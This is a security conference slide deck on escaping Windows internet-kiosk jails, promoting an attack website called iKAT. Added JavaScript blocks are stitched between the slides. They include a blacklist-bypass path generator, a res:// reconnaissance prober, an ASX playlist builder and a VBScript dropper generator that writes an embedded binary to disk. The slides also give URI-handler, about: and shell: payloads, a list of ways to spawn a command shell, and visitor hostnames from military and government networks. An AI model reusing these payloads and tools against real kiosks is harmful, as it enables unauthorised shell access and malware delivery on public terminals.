Hacking Internet Kiosks

Paul Craig
Principal Security Consultant
Security-Assessment.com
Bio

- Who am I?
- Paul Craig
- Principal Security Consultant, Security-Assessment.com, Auckland, New Zealand
- Published Security Author.
- Active Security Researcher.
- Devoted Hacker.

- Comments, Feedback?
- Email: paul@ha.cked.net
- Website: http://ha.cked.net
Overview

- Hacking Kiosks:
  - What is an Internet Kiosk.
  - Kiosk Software Security Model.
  - Vulnerabilities in Kiosk Software.
  - Vulnerabilities in the Kiosk Security Model.

"Hack any Windows Kiosk in less than 120 seconds!"

- Tool Release.
- Live Demos: Hacking (Two) Commercial Internet Kiosks.
- More 0day than you can shake a stick at.
What Is An Internet Kiosk

- Last Year I Was Sitting in an Airport...
  - 8 hour stop-over in Hong Kong.
  - Queue of people waiting to use a hub of Internet Kiosks.
  - "Damn, those kiosks sure are popular..."
  - "I wonder if I could hack it?"

- Kiosks are popular, and rarely appear in security publications.
- Popularity + Poor Security Visibility = Good Attack Target

- Personal Objective:
  - Find every possible method of hacking Internet Kiosk terminals.
  - Become the King of Internet Kiosk Hacking!
What Is An Internet Kiosk

- Kiosks are everywhere
  - Airports, Train stations, Libraries, DVD Rental Stores, Corporate Building Lobbies, Convenience Stores, Post Offices, Cafes, Hospitals, Motels, Hotels, Universities.
- Cheap technology has made Internet Kiosks very common.
What Is An Internet Kiosk

- Initial Observations of Kiosks

- Hardware.
  - Kiosks built in tough hard-shell cases.
  - Fibreglass, Steel, Thick MDF.
  - Lack of physical access to the underlying computer.
  - Input devices inaccessible (Floppy/DVD/USB/FireWire).
  - Kiosk bolted to the ground (padlocked).

- General public are not trusted.
  - Kiosks are designed to prevent physical theft or malicious use.
What Is An Internet Kiosk

- Software.
  - Majority of Kiosks run commercial Windows Kiosk software.
  - Linux/BSD Kiosks exist, Windows more popular.
  - 44 commercial Windows Kiosk products in the market.
  - Marketed as: "Turn that old PC into instant revenue!"
  - Buy $59.99 Shareware -> Install -> Instant Kiosk!

- Kiosk Software Essentially Skins Windows:
  - Kiosk browsers based on standard Internet Explorer libraries.
  - WINHTTP.DLL / MSINET.OCX
  - It's Windows and Internet Explorer, highly customized.
What Is An Internet Kiosk

- "Kiosk Software Is The Best Attack Target."
  - Hardware hacking is too obtrusive for public locations.

- "I Need to Walk up to Any Internet Kiosk and Pop Shell, Quickly."
  - Explorer.exe, cmd.exe, command.com.
  - Time limited, 2 minutes or faster.

- 16 Months of Kiosk Software Penetration Testing Later...
  - Virtualized ten of the most popular Windows Kiosk platforms.
  - Researched methods of compromising each Kiosk.
  - Developed Kiosk Attack Methodology.

- Startling Results: 100% success rate!
Kiosk Security Model

- Kiosk Software Implements Security in Two Approaches.

- #1 - Reduce Available Host Functionality.
  - Disallow native OS functionality that can be used maliciously.
  - "Command Prompt has been Disabled"
  - "File Downloads Have Been Disabled"
  - Implemented through native ACLs.

- #2 - Graphically Jailed Into a 'Secure Kiosk Browser'.
  - Kiosk users are stuck inside a Kiosk browser.
  - Kiosk browser runs full screen, no ability to close or minimize.
  - Start Bar/Tray Menu removed or hidden.
  - Only thing you can do is browse the web.
Kiosk Security Model

- Example #1: SiteKiosk.
  - Looks similar to Windows.
  - Custom Tray Menu/Task Bar.
  - Only one option, 'New Window'.
  - Real Windows 'Start' bar is hidden from view.
  - Trapped inside the Kiosk browser.
Kiosk Security Model

- Example #2: NetStop Kiosk
  - Custom task bar.
  - Kiosk application runs as a full screen desktop.
  - No ability to close the browser.
  - Only permits internet browsing.
Kiosk Security Model

- Kiosk Browsers Proactively Monitor Your Activity.
  - Kiosks contain multiple blacklists of prohibited activity.
  - Try to do something sneaky, the Kiosk will stop you.

- Try to Browse C:\ with the Kiosk browser:

- Blacklist in-focus Modal Dialogs.
  - Block dialogs by Window Title or Window Class.
  - "Save File As", "Open With", "Confirm File Delete", "Print".
  - WM_CLOSE Window message sent to the blacklisted dialog.
  - Dialog closes.
Kiosk Security Model

- API Hooking.
  - Hook native OS API calls which can be used maliciously.
  - KillProcess(), GetCommandLineW(), AllocConsole()
  - "Unauthorized Functionality Detected, Process Killed".

- Kiosk Browser run in 'High Security Zone'
  - File downloads disabled.
  - Browser scripting, pop-ups, ActiveX, all disabled.

- Watchdog Timer.
  - Every 5 minutes the Kiosk will enumerate all active processes.
  - Terminate any unauthorized activity.
Kiosk Security Model

- Custom Keyboard Driver.
  - Disable Windows shortcut key combinations:
    CTRL-SHIFT-ESC (Task Mgr)
    ALT-TAB (Switch Task)
    CTRL-ALT-DELETE (Task Mgr)
    CTRL-ESC (Start Menu)
    ALT-F4 (Close Application)
  - Modifier Keys Unmapped: CTRL, Tab, ALT, 'Start', Function keys F1-F12.

- Custom Keyboard with missing modifier keys!
- Custom Mouse.
  - No right click button.

- All methods of reducing functionality!
Hacking Kiosk Software

- Kiosk Security Model is Based on Reducing Functionality.
  - Limit functionality which can be used to escape the Kiosk browser.

- Exploiting A Kiosk Requires Invoking Functionality.
  - Cause applications/functionality to spawn, pop up on screen.
  - Use the invoked functionality to escape the Kiosk jail.
  - Spawn a command prompt, get back to Windows.

- Kiosk Security Is Implemented Through Blacklists.
  - Blacklists (by nature) are never 100%.
  - We only need one method of escaping the software jail.
Hacking Kiosk Software

- Let's Say You Find a Kiosk in Your Local Mall.
  - '10RM for 1 hour of internet usage'
  - Insert money.

- You Find You are Trapped Inside a Kiosk Browser.
  - Only one visible button to 'Start Browsing'
  - Start Browsing...
Hacking Kiosk Software

- Browse The Local File System Using The Kiosk Browser.
  - Local Windows users are capable of browsing the file system.
  - Kiosk software must explicitly block local browsing attempts.

- Windows Is Designed For Idiots.
  - Caters for mistypes/fat-fingers.
  - C:\windows\ may be blocked, but a string blacklist has to catch every equivalent spelling, and every environment variable that expands to a local path:
    File:/C:/windows  File:/C:\windows\  File:/C:\windows/  File:/C:/windows
    File://C:/windows  File://C:\windows/  file://C:\windows  C:/windows
    C:\windows\  C:\windows  C:/windows/  C:/windows\
    %WINDIR%  %TMP%  %TEMP%  %SYSTEMDRIVE%
    %SYSTEMROOT%  %APPDATA%  %HOMEDRIVE%  %HOMESHARE%

- Blacklists start failing about now.
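The point of the slide above, as an added example that is not part of the original deck: generate the spellings of one local path that a kiosk URL blacklist has to cover, run them against a naive exact-match blacklist of the kind the slides describe, and then against a blacklist that canonicalises first. The naive blacklist's three entries and the environment-variable expansion map are assumptions chosen for the example.

```javascript
"use strict";

// Environment variables that a kiosk browser or the shell expands to a local
// directory. %WINDIR%/%SYSTEMROOT% resolve to the Windows directory;
// %SYSTEMDRIVE% to the drive letter.
const ENV_ALIASES = ["%WINDIR%", "%SYSTEMROOT%", "%SYSTEMDRIVE%\\windows"];

// Every spelling of one local folder that Windows and IE accept as
// equivalent: both slash directions, with and without a trailing separator,
// bare or behind a file: scheme with zero, one, two or three slashes.
function localPathVariants(drive, folder) {
  const bases = [`${drive}:\\${folder}`, `${drive}:/${folder}`];
  const prefixes = ["file:", "file:/", "file://", "file:///", "File:/", "File://"];
  const out = new Set();
  for (const base of bases) {
    for (const trail of ["", "\\", "/"]) {
      const p = base + trail;
      out.add(p);
      for (const prefix of prefixes) out.add(prefix + p);
    }
  }
  for (const alias of ENV_ALIASES) out.add(alias);
  return [...out];
}

// The kind of blacklist the slides describe: exact matches on the spellings
// the vendor thought of (assumed entries for the example).
function naiveBlacklist(url) {
  const blocked = ["c:\\windows", "c:\\windows\\", "file://c:/windows"];
  return blocked.includes(url.toLowerCase());
}

// What a blacklist has to do instead: canonicalise first (strip the scheme
// and its slashes, expand the environment variables it knows, unify
// separators, drop trailing separators, fold case), then compare.
function canonicalLocalPath(url) {
  let s = url.trim().replace(/^file:\/*/i, "");
  s = s.replace(/%WINDIR%|%SYSTEMROOT%/gi, "C:\\windows").replace(/%SYSTEMDRIVE%/gi, "C:");
  return s.replace(/\//g, "\\").replace(/\\+$/, "").toLowerCase();
}

function canonicalBlacklist(url) {
  return canonicalLocalPath(url) === "c:\\windows";
}

// Which variants get past a given check.
function survivors(variants, check) {
  return variants.filter((v) => !check(v));
}

const variants = localPathVariants("C", "windows");
console.log(`${variants.length} spellings of C:\\windows generated`);
console.log("naive blacklist misses:", survivors(variants, naiveBlacklist).length);
console.log("canonicalising blacklist misses:", survivors(variants, canonicalBlacklist).length);
```

The canonicalising check still only knows the variables it was told about; anything like %TMP% or %APPDATA% that points somewhere else is a separate decision (allow the path or not), which is why denying by destination rather than by string is the only version of this that holds up.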
Hacking Kiosk Software

- Using Common Dialogs To Hack Kiosks.
  - Windows contains 'Common Dialogs' libraries.
  - Saving a file, opening a file, selecting a font, choosing a colour.
  - COMDLG32.DLL (Common Windows Dialogs Library).
  - COMDLG32.DLL implements Common Windows Controls from COMCTL32.DLL (Common Windows Controls Library).

- File/Open, File/Save Dialogs Contain 'File View' Controls.
  - File view control provides full Explorer functionality.
  - Same control that Windows Explorer uses.
  - File-Open Dialog = Explorer
  - Can be used to launch processes.
Hacking Kiosk Software

- Systematically Click Every Button, Graphic, Icon In The Kiosk
  - Can we invoke a File - Open Dialog? "Attach File"
  - Browse the file system
  - Right Click cmd.exe: Open / Run As
  - Spawn cmd.exe
Hacking Kiosk Software

- Internet Explorer 'Image Toolbar'.
  - Toolbar hovers top-left of a large image when clicked.
  - Each icon of this toolbar can invoke a Common Dialog.
    - File/Save.
    - File/Print.
    - File/Mailto.
    - Open "My Pictures" in Explorer.
  - Toolbar is present if the Kiosk uses Internet Explorer libraries.

- Click a large image on screen
  - Spawn a Common Dialog, spawn Explorer.
Hacking Kiosk Software

- Using the Keyboard.
  - Keyboard shortcuts can be used to access the host OS.
  - Is a custom keyboard driver present?
  - Are modifier keys enabled?

- Keyboard Combinations Which Produce Common Dialogs.
    CTRL-B, CTRL-I (Favourites)
    CTRL-H (History)
    CTRL-L, CTRL-O (File/Open Dialog)
    CTRL-P (Print Dialog)
    CTRL-S (Save As)

- Kiosk Specific 'Administrative' shortcuts.
  - All Kiosk products contain a hidden Administrative menu.
  - Mash the keyboard, CTRL-ALT-F8? CTRL-ESC-F9?
Hacking Kiosk Software

- Browser Security Zones
  - Browser security model incorporates multiple security zones:
    Restricted Sites
    Internet Zone
    Intranet Zone
    Trusted Sites
  - Each security zone adheres to a different security policy.
  - Internet zone has less ability to interact with a host.
  - Trusted Sites, Intranet Zone typically have more access.
Hacking Kiosk Software

- Local Users Can Access All Available Security Zones.
  - URLs must be directly typed into the URL entry bar.

- Security Zone Escalation: about: pluggable-protocol handler.
  - About handler belongs to the 'Trusted Sites' security zone.
  - Suffers from a Cross Site Scripting vulnerability.
  - Local users can render arbitrary content within a trusted zone.

- Spawn a File Open Common Dialog from a trusted security zone.
    about:<input%20type=file>
    about:<a%20href=C:\windows\>Click-Here</a>

- Internet zone cannot follow links to the file system.
- Trusted sites can.
Hacking Kiosk Software

- Shell Protocol Handler.
  - Shell handler provides access to Windows web folders.

- Type Into the URI Bar:
    Shell:Profile
    Shell:ProgramFiles
    Shell:System
    Shell:ControlPanelFolder
    Shell:Windows

- Each URL will spawn explorer.exe and browse the web folder.

- Is the shell: handler blocked by the Kiosk?
Hacking Kiosk Software

- How About This:
    shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}
  - Invoke the Windows Control Panel by ClassID.
  - Works from common Internet Explorer libraries.
  - Bypass native ACLs that may exist on control.exe
Hacking Kiosk Software

- The Downside to Physical Input Vectors.
  - Kiosk software is designed to not trust the guy on the keyboard.
  - Kiosk User = Most Obvious Security Threat.
  - My research concluded that physical inputs are not so successful.
  - 40-50% chance of popping shell.
  - Many techniques are already published, unoriginal.

- A Subtle Discovery...
  - Remote websites not factored into the Kiosk security model.
  - Websites are trusted MORE than a local Kiosk user!
  - Kiosks rely on the default web browser security model.
Hacking Kiosk Software

- "I Need a Kiosk Hacking Website."
  - An online tool you can visit from an Internet Kiosk terminal.
  - Provide all the content you will ever need to escape a Kiosk jail.

- iKAT - Interactive Kiosk Attack Tool.
  - First of its kind! New method of hacking Internet Kiosks!
  - Fast! iKAT can pop shell in less than 30 seconds.
  - 95-100% success rate!
  - http://ikat.ha.cked.net
Hacking Kiosk Software

- What Can iKAT Do?
- Kiosk Reconnaissance: Detect Installed Applications
  - JavaScript & res:// (resource) protocol handler.
  - Extract bitmap resources from PE executables.
  - Verify bitmap presence and detect installed applications.
  - Detects all common commercial Kiosk platforms.
  - Enumerates locally installed applications.
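The res:// reconnaissance described above, as an added example (not iKAT's own code): Internet Explorer resolves res://<module>/#<type>/#<id> to a resource inside a PE file on the local disk, so an image whose src points at a bitmap resource (type 2, RT_BITMAP) fires onload when the file and resource exist and onerror otherwise. The probe table, its install paths and resource ids are placeholders chosen for the example; a real table records ids verified against each binary. The list-building and classification are plain functions so they run outside a browser.

```javascript
"use strict";

const RT_BITMAP = 2;

// res://<module path>/#<resource type>/#<resource id>
function buildResUrl(modulePath, resourceId, resourceType = RT_BITMAP) {
  return `res://${modulePath}/#${resourceType}/#${resourceId}`;
}

// Probe table (placeholder paths and ids). "kiosk: true" marks entries whose
// presence identifies the kiosk product itself rather than a helper app.
const PROBES = [
  { name: "Windows Media Player", module: "C:\\Program Files\\Windows Media Player\\wmplayer.exe", id: 1 },
  { name: "Java Runtime", module: "C:\\Program Files\\Java\\jre6\\bin\\javaw.exe", id: 1 },
  { name: "Adobe Flash Player", module: "C:\\WINDOWS\\system32\\Macromed\\Flash\\Flash10a.ocx", id: 1 },
  { name: "SiteKiosk", module: "C:\\Program Files\\SiteKiosk\\SiteKiosk.exe", id: 1, kiosk: true },
  { name: "NetStop", module: "C:\\Program Files\\NetStop\\NetStop.exe", id: 1, kiosk: true },
];

// Turn the table into the URLs IE will try to load.
function probeUrls(probes = PROBES) {
  return probes.map((p) => ({ name: p.name, kiosk: !!p.kiosk, url: buildResUrl(p.module, p.id) }));
}

// Reduce raw load results ({name, kiosk, loaded}) into a report: which apps
// answered, which did not, and which kiosk product (if any) is running.
function classify(results) {
  const installed = results.filter((r) => r.loaded).map((r) => r.name);
  const absent = results.filter((r) => !r.loaded).map((r) => r.name);
  const kiosk = results.find((r) => r.loaded && r.kiosk);
  return { installed, absent, kioskProduct: kiosk ? kiosk.name : null };
}

// Browser-only wiring: fire every probe, collect onload/onerror, then report.
function runProbes(done, probes = PROBES) {
  const targets = probeUrls(probes);
  const results = [];
  const finish = () => { if (results.length === targets.length) done(classify(results)); };
  for (const t of targets) {
    const img = new Image();
    img.onload = () => { results.push({ ...t, loaded: true }); finish(); };
    img.onerror = () => { results.push({ ...t, loaded: false }); finish(); };
    img.src = t.url;
  }
}

if (typeof Image !== "undefined") {
  runProbes((report) => console.log(JSON.stringify(report)));
} else {
  // Outside a browser: print the probe URLs and classify a constructed
  // result set (every other probe pretends to have loaded).
  console.log(probeUrls().map((p) => p.url).join("\n"));
  const sample = probeUrls().map((p, i) => ({ ...p, loaded: i % 2 === 0 }));
  console.log(classify(sample));
}
```

Only the IE engine honours res://, so a probe page that gets all onerror callbacks on a non-IE kiosk browser tells you about the browser, not the disk; check the appVersion the slide below describes before trusting an all-absent result.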
Hacking Kiosk Software

- Display Local Browser Variables.
  - Determine underlying Kiosk browser technology.
  - MSINET.OCX, WINHTTP.DLL display Internet Explorer appVersion.
  - Detect the presence of the .NET CLR.

- Display Remote Server Variables
  - Discover remote IP address of the Kiosk terminal.
Hacking Kiosk Software

- All Common Browser Dialogs In One Place
  - File Open, Save As, Print, Print Preview:
  - Click down the list and determine what dialogs are blocked.
  - Use the File View control within the dialogs.
Hacking Kiosk Software

- Use Flash To Invoke Common Dialogs.
  - Adobe Flash is the most widely used browser plug-in.
  - ActionScript 3 can invoke three unique File View dialogs.
    - 'Select File For Upload'
    - 'Select File(s) For Upload'
    - 'Select location for Download by ikat.ha.cked.net'

- Flash Common Dialogs have Unique Dialog Titles
  - Not standard "Choose File"
  - Bypass dialog Window title blacklists.
  - Still contains the File View control.

- Blacklists fail (again).
Hacking Kiosk Software

- Spawning Applications On The Kiosk.
  - Can we cause an application/process to spawn on the Kiosk?
  - Does the spawned application contain a common dialog?
  - Use the application to gain additional access to the Kiosk.

- iKAT Invokes Default Windows URI Handlers.
  - URI handler applications are spawned for each URI.
  - Callto://, Gopher://, HCP://, Telnet://, TN3270://, Rlogin://, LDAP://, News://, Mailto://
  - One Click Automation: One click spawns all default handlers.

- 3rd party URI Handlers
  - MMS://, SKYPE://, SIP://, Play://, Steam://, Quicktime://
Hacking Kiosk Software

- Example: HCP:// - Help And Support Center
    <a href=HCP://dummy>Click-me</a>
  - Search HCP for what you want to launch: "Command Prompt"
  - "Using Command Prompt" provides a link to spawn cmd.exe
  - Left Click Only!
Hacking Kiosk Software

- iKAT Provides Links to Over 100 URI Handlers.
  - Click, click, click down the list.
  - Determine which handlers are covered by the Kiosk blacklist.
  - Use invoked handler application to escape the Kiosk.

- iKAT Contains Local Security Zone Handlers
  - about:, res:, shell:
  - Lists of URLs to type in.
  - Remembering ClassIDs is hard.
Hacking Kiosk Software

- Invoke Applications Using File Type Handlers.
  - Click on test.myfile, Windows will spawn the 'myfile' handler.
  - iKAT uses DHTML/JavaScript to invoke 108 unique file handlers.

- Internet Explorer supports prompt-less handler execution.
  - Example: Click test.wmv, Windows Media Player spawns.
  - No Prompt "Are you sure you want to...".
  - Kiosk blacklists monitor in-focus dialogs for warning prompts; with no prompt there is nothing for them to catch.
Hacking Kiosk Software

- iKAT & Windows Media Files.
  - WMPlayer will silently launch for multiple file types.
  - Windows Media Playlist Files (.ASX)
  - Supports 'Web Enhanced Content'.

- Turn Windows Media Player into a web browser!
  - Provides a browser without any Kiosk security controls.
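The 'Web Enhanced Content' playlist described above, as an added example that is not from the deck or from iKAT: an ASX playlist carries an HTMLView PARAM naming a page for Windows Media Player to render alongside the clip, and a defender-side scanner pulls those targets back out of any ASX a kiosk is handed. The host names are placeholders; the HTMLView parameter is Microsoft's documented ASX element, the rest is this example's own.

```javascript
"use strict";

function xmlEscape(s) {
  return String(s)
    .replace(/&/g, "&amp;").replace(/</g, "&lt;")
    .replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

function xmlUnescape(s) {
  return s.replace(/&quot;/g, '"').replace(/&gt;/g, ">")
    .replace(/&lt;/g, "<").replace(/&amp;/g, "&");
}

// Attacker side: a playlist that plays one clip and asks Windows Media
// Player to render htmlViewUrl alongside it. HTMLView is set both at
// playlist level and on the entry so it applies whichever scope the player
// honours.
function buildWebEnhancedAsx({ title, mediaUrl, htmlViewUrl }) {
  const view = `<PARAM NAME="HTMLView" VALUE="${xmlEscape(htmlViewUrl)}" />`;
  return [
    '<ASX VERSION="3.0">',
    `  <TITLE>${xmlEscape(title)}</TITLE>`,
    `  ${view}`,
    "  <ENTRY>",
    `    <REF HREF="${xmlEscape(mediaUrl)}" />`,
    `    ${view}`,
    "  </ENTRY>",
    "</ASX>",
  ].join("\n");
}

// Defender side: list every distinct HTMLView target in an ASX body. Element
// and attribute names are matched case-insensitively, as the player does,
// and attribute order is not assumed.
function htmlViewTargets(asxText) {
  const tags = asxText.match(/<PARAM\b[^>]*>/gi) || [];
  const out = new Set();
  for (const tag of tags) {
    const name = /\bNAME\s*=\s*"([^"]*)"/i.exec(tag);
    const value = /\bVALUE\s*=\s*"([^"]*)"/i.exec(tag);
    if (name && value && name[1].toLowerCase() === "htmlview") out.add(xmlUnescape(value[1]));
  }
  return [...out];
}

// Constructed sample values for the demonstration.
const asx = buildWebEnhancedAsx({
  title: "Example clip",
  mediaUrl: "http://media.example/clip.wmv",
  htmlViewUrl: "http://tool.example/browser.html?a=1&b=2",
});
console.log(asx);
console.log("HTMLView targets:", htmlViewTargets(asx));
```

On a kiosk, any ASX with an HTMLView target outside the operator's own domain is a browser the kiosk software never sees; blocking .asx at the proxy, or stripping the PARAM there, is simpler than hoping the kiosk's dialog blacklist notices the player window.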
Hacking Kiosk Software

- iKAT & Office Documents.
  - If an Office file viewer is installed on the Kiosk, we win.
  - Embed a copy of cmd.exe within an Office document.
  - Supported by .DOC, .DOCX, .XLS, .XLSB, .XLSM, .XLSX
  - 'Open Package Contents' dialog not detected by any Kiosk.

- iKAT will spawn the most useful file possible.
Hacking Kiosk Software

- iKAT & Java Applets:
  - Signed Java applets can execute local processes.
  - Detect if JRE is installed (iKAT Kiosk Reconnaissance).
  - Does the Kiosk detect the Java security warning prompt?
  - "Warning - Security"
  - 0% of tested Kiosks did.

- iKAT Contains Signed Kiosk Specific Java Applets.
  - Signed applets to spawn command shells.
  - Includes Jython by GNUCITIZEN.
Hacking Kiosk Software

- Install a Malicious ActiveX
  - Safe-for-scripting ActiveX controls can be used to compromise a Kiosk.
  - Unsafe method: object.execute('cmd.exe');
  - Can we install a malicious ActiveX on the Kiosk?

- iKAT ActiveX
  - Safe-for-scripting ActiveX which executes arbitrary executables.
  - Installing an ActiveX requires administrative authority.
  - iKAT ActiveX gives you the ability to spawn a shell.

- ActiveX is changing:
  - IE8 will not require admin rights for installing a new ActiveX.
Hacking Kiosk Software

- iKAT & ClickOnce Applications
  - ClickOnce is .NET 2.0+ technology (.NET CLR 2+ required).
  - 'Online Application Deployment' .application file handler.
  - Unsigned ClickOnce applications execute with full trust!
  - Admin privileges are not required!

- Users are warned:
  - All tested Kiosks fail to detect this warning message!

- Modern Kiosks now developed in .NET (CLR is present!)
Hacking Kiosk Software

- The most useful ClickOnce applications for Kiosk Hacking?

- Embedded Web Browser.
  - HTTP browser with reduced security settings.

- Application Executor.
  - Spawn arbitrary executables.

- Access Token Pincher.
  - Access token hijacking is a hip subject, why not!
  - Does the Kiosk user have the SeImpersonate privilege?
  - Impersonate available (privileged) tokens.
  - Spawn cmd.exe under the context of the privileged token.
  - System shell, I win.
Hacking Kiosk Software

- Who Here Has Ever Crashed a Web Browser?
  - What about crashing a Kiosk: 'Emo-Kiosking'
  - Create an unhandled exception in a Kiosk browser.
  - Kiosk browser crashes, we get the desktop, we win!
  - Rare situation: Application crash = highly critical vulnerability.

- iKAT Contains Common Browser Crash Techniques.
  - Published exploits which result in a crash.
  - Fastest, easiest method of escaping a Kiosk.
  - Fairly reliable, 40%-50% of tested Kiosks crash.
  - Kiosks crash, or reboot.
Hacking Kiosk Software

- Crashing Browser Plug-ins.
  - "Can I create a .SWF file that can reliably crash a browser?"
  - Sequential byte file format fuzzing of the .SWF format.
  - Found multiple unhandled exception situations.
  - Integer Divide By Zero.
  - Immediately un-exploitable, reliably crashes any browser.

- Created 'iKAT Auto Magic Flash Crasher'.
  - Is the Flash Plug-in Installed on The Kiosk?
  - iKAT can crash it, guaranteed, oh-day magic.
  - Adobe have resolved this issue in Flash Player 10 RC.
Downloading Tools

- Let's Assume Something Worked.
  - You have access to the Kiosk file system.
  - Command shell spawned, Common Dialog, Java installed, etc.

- What Now?
  - Download additional tools/binaries.

- How Do You Download Files In a Tool-less Environment?
  - Kiosk terminal will not have a copy of wget.exe present.
  - Internet Explorer is likely uninstalled or disabled.
  - File downloads disabled.
Downloading Tools

- Old School: Downloading Files In Windows:
- Using Common Dialogs
  - 'Attach' a remote file from a File-Open dialog.
  - FPSE/WebDAV to save the file locally, and attach it.
  - Works From Any File->Open Dialog.
  - File saved in a writeable location.
  - Temporary internet files.
  - Downloads any file type/size.
Downloading Tools

- Use Flash To Download Files.
  - Most Kiosks disable File Downloads with browser security policy.
  - IE: Tools -> Internet Options -> Custom Level

- Flash can be used to circumvent the browser policy.
  - Download method of the FileReference() object.
  - Flash does not validate browser security policy.
  - Very high success rate against Kiosks.
  - Another unpublished oh-day trick.
Downloading Tools

- Notepad Can Download and Upload Files.

- File -> Open
  - http://test.com/trojan.txt
  - Content must be 7bit safe.

- File -> Save
  - Upload content to a remote site.
  - FPSE/WebDAV
  - http://www.ok.com/blah.txt

- Quickly upload files from a Kiosk.
Downloading Tools

- #1 Problem: Kiosk Hacking is a Tool-less Environment
  - "iKAT needs to provide tools for Kiosk hacking".

- Assorted Kiosk Hacking Tools:
  - Tools available as .exe, .zip, Flash Download, 7bit Safe VBScript (.VBS/.VBE)!
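Both the Notepad File->Open route above (content must be 7bit safe) and the '7bit Safe VBScript' tool format come down to the same thing: any binary can be carried as printable ASCII and rebuilt on the kiosk. As an added example that is not iKAT's code, this generator encodes a file as hex inside a VBScript that writes the bytes back with an ADODB.Stream opened as text with the iso-8859-1 charset (whose code points map one-to-one onto bytes 0-255, and which writes no byte-order mark), and a round-trip check proves the encoding is lossless. The sample payload and output path are constructed for the example.

```javascript
"use strict";

function toHex(bytes) {
  return Array.from(bytes, (b) => b.toString(16).padStart(2, "0").toUpperCase()).join("");
}

function hexToBytes(hex) {
  const out = new Uint8Array(hex.length / 2);
  for (let i = 0; i < out.length; i++) out[i] = parseInt(hex.slice(i * 2, i * 2 + 2), 16);
  return out;
}

// Build the VBScript. The hex payload is split into fixed-width
// concatenation lines; the script rebuilds each byte with ChrW (not Chr,
// which goes through the ANSI code page and mangles 0x80-0x9F) and writes
// through an ADODB.Stream opened as text with charset iso-8859-1.
function buildVbsDropper(bytes, outputPath, width = 64) {
  const hex = toHex(bytes);
  const lines = [
    "' Added example: rebuilds an embedded binary from hex and writes it to disk",
    "Option Explicit",
    "Dim h, i, s",
    'h = ""',
  ];
  for (let i = 0; i < hex.length; i += width) lines.push(`h = h & "${hex.slice(i, i + width)}"`);
  lines.push(
    'Set s = CreateObject("ADODB.Stream")',
    "s.Type = 2              ' adTypeText",
    's.Charset = "iso-8859-1"',
    "s.Open",
    "For i = 1 To Len(h) Step 2",
    '  s.WriteText ChrW(CInt("&H" & Mid(h, i, 2)))',
    "Next",
    `s.SaveToFile "${outputPath}", 2   ' adSaveCreateOverWrite`,
    "s.Close",
  );
  return lines.join("\r\n") + "\r\n";
}

// 7-bit check: every character must be plain ASCII so Notepad, a text
// File->Open or a copy-and-paste cannot alter it.
function isSevenBitSafe(text) {
  for (let i = 0; i < text.length; i++) if (text.charCodeAt(i) > 0x7f) return false;
  return true;
}

// Round-trip check: recover the embedded bytes from the generated script
// exactly as the VBScript loop would.
function recoverBytes(vbsText) {
  const re = /^h = h & "([0-9A-F]*)"\r?$/gm;
  let hex = "";
  let m;
  while ((m = re.exec(vbsText)) !== null) hex += m[1];
  return hexToBytes(hex);
}

// Constructed sample payload (an MZ header fragment plus edge-case bytes);
// the output path is an assumed location writeable by a kiosk user.
const SAMPLE = Uint8Array.from([0x4d, 0x5a, 0x90, 0x00, 0x03, 0x7f, 0x80, 0x9f, 0xff]);
const script = buildVbsDropper(SAMPLE, "C:\\Documents and Settings\\kiosk\\tool.exe");
console.log(script);
console.log("7-bit safe:", isSevenBitSafe(script));
console.log("round-trip ok:", toHex(recoverBytes(script)) === toHex(SAMPLE));
```

Hex doubles the size, which is fine for a few hundred kilobytes through Notepad; the script runs under wscript.exe or cscript.exe, so a kiosk ACL that only names cmd.exe does not stop it, which is the same blacklist gap the CMD Detours slide makes.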
Downloading Tools

- Command Shell Detours:
  - How many ways to spawn a command shell on Windows? Examples from the slide:
    cmd.exe
    command.com
    %COMSPEC%
    win.com cmd.exe
    win.com command.com
    loadfix.com cmd.exe
    loadfix.com command.com
    start.exe
    start loadfix.com cmd.exe
    start loadfix.com command.com
    start loadfix.com %COMSPEC%
    sc create testsvc binpath= "cmd /K start" type= own type= interact

- Win.com? Loadfix.com? Start? Combinations of both?
  - Kiosk ACLs typically block cmd.exe from spawning.
  - What about command.com, win.com?

- CMD Detours attempts 17 methods of invoking a shell.
  - Flawless at bypassing Kiosk ACLs.
iKAT Reloaded

- Officially Released at Defcon 16 Las Vegas.
  - Amazing success!
  - iKAT can pop shell on ANY Vegas Kiosk < 10 seconds

- Who's Been Using iKAT?
  - 14,000+ unique hits, 10-15% of requests from Kiosks!
  - reception.sitekiosk.com, comm775-kiosknet-dhcp8.bu.edu & comm685-kiosknet-dhcp74.bu.edu
  - 12-46-54-181.seatac.seattwa.wayport.net, Aoc.ppx-bc2.hqda-aoc.army.pentagon.mil
  - Digger2.defence.gov.au, Radisson-hotel-19.lax.customer.centurytel.net
  - Security-lab1.juniper.net, Lan-116.181.coresecurity.com
  - Ustdc1.deloitte.com, Deloitteservices.deloitte.nl, Dh212.public.mod.uk

- iKAT Portable Now Available!
  - Entire iKAT website in a zip file
  - Useful for offsite penetration testers.
Pwnage!

Hacking Kiosks: The Demos

- Two virtualized (commercial) Kiosk products.
  - Recommended Kiosk application configuration.
  - Default Windows XP install.

- Using iKAT To Pop a Command shell
  - As Fast As Possible!
Conclusion

Questions?
Email me:
paul@ha.cked.net
paul.craig@security-assessment.com